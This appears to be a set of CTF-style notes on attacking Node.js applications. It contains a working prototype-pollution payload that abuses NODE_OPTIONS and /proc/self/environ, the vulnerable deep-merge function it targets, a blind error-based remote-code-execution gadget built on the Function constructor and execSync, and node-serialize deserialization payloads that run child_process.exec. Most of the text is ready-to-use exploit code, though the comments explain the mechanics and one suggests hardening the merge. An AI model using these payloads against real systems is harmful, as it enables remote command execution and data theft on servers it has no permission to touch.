NodeJS Polluting environment
{ "name": "xct", "constructor": { "prototype": { "env": { "AAAA": "require('child_process').exec('cat *').stdout.pipe(process.stdout);//", "NODE_OPTIONS": "--require /proc/self/environ" } } }, "paper": 10 }
The payload reaches `Object.prototype` through `constructor.prototype` rather than `__proto__` (which suggests the challenge's key filter only rejected `__proto__`) and stores an `env` object there. Node's `child_process` spawn helpers read `options.env`, so an options object with no own `env` can pick up the polluted one, and a Node child started afterwards (e.g. via `fork()`) is launched with `NODE_OPTIONS=--require /proc/self/environ`: it then loads its own environment as a JavaScript file. Because the polluted `env` replaces the child's environment entirely, `AAAA=<js>` is the first entry, and the trailing `//` comments out the rest of the NUL-separated file. This only fires if the application spawns a Node child after the pollution, and newer Node releases may not honor an inherited `env` at all — verify against the target's Node version. In a CTF challenge this worked because the application's merge method was implemented like this:
// Deep-merges `source` into `target` in place and returns `target`.
// As written, this is the prototype-pollution sink used by the payload above:
//  - `for...in` visits inherited enumerable keys as well as own keys;
//  - `isValidKey` (not shown) evidently lets "constructor" through — the payload
//    avoids "__proto__", which suggests that is the only key it rejects;
//  - `target[key]` is a plain property read, so with key === "constructor" it
//    resolves through the prototype chain to `Object`, and the next recursion
//    level reaches `Object.prototype` via its "prototype" key. For that path to
//    recurse, `isObject` (not shown) must also accept functions — confirm against
//    the challenge source.
// A hardened version would require `Object.hasOwn(source, key)`, reject
// "__proto__", "constructor" and "prototype", and only recurse into
// `target[key]` when it is an own property of `target`.
merge(target, source) {
  for (let key in source) {
    if (this.isValidKey(key)) {
      if (this.isObject(target[key]) && this.isObject(source[key])) {
        // Recursing with target === Object / Object.prototype is the pollution step.
        this.merge(target[key], source[key]);
      } else {
        // Writes through to whatever `target` currently is, including Object.prototype.
        target[key] = source[key];
      }
    }
  }
  return target;
},
NodeJS Blind Error based Pollution
// Blind, error-based RCE gadget. `''['constructor']['constructor']` is the
// Function constructor: the IIFE returns Function, the second call compiles the
// string into a function, and the final `()` runs it. The generated function
// runs PAYLOAD with execSync and throws an Error whose message is the command
// output, so the result is exfiltrated through the error message — useful when
// the application only reflects errors (hence "blind"). Replace ` PAYLOAD ` with
// the shell command. `global.process.mainModule.constructor._load` is
// `Module._load`, i.e. `require` from code that has no module-scoped `require`;
// `process.mainModule` is deprecated and is not set when the entry point is an
// ES module, in which case another route to `require` is needed. The
// `!xct ? '__proto__' : 'constructor'` branch is never taken with the argument
// 'constructor'; it is obfuscation, not part of the gadget.
[(function test(xct){return ''[!xct?'__proto__':'constructor'][xct]})('constructor')('throw new Error(global.process.mainModule.constructor._load(\"child_process\").execSync(\" PAYLOAD \").toString())')()]
NodeJS Deserialization RCE
// Vulnerable sink: node-serialize's unserialize() rebuilds any string value that
// starts with `_$$ND_FUNC$$_` by eval'ing the function source that follows it,
// so attacker-controlled `data` (presumably a request body or cookie here — not
// shown) yields code execution. A payload whose function ends in `()` is an IIFE
// and runs during unserialize() itself; without it the function is only created
// and would have to be invoked by the application later. There is no safe option
// for this library with untrusted input — use JSON.parse() instead.
var s = require('node-serialize');
s.unserialize(data);
{"a":"_$$ND_FUNC$$_function(){console.log(\"xct\")}"}
{"a":"_$$ND_FUNC$$_function(){require('child_process').exec('...')}()"}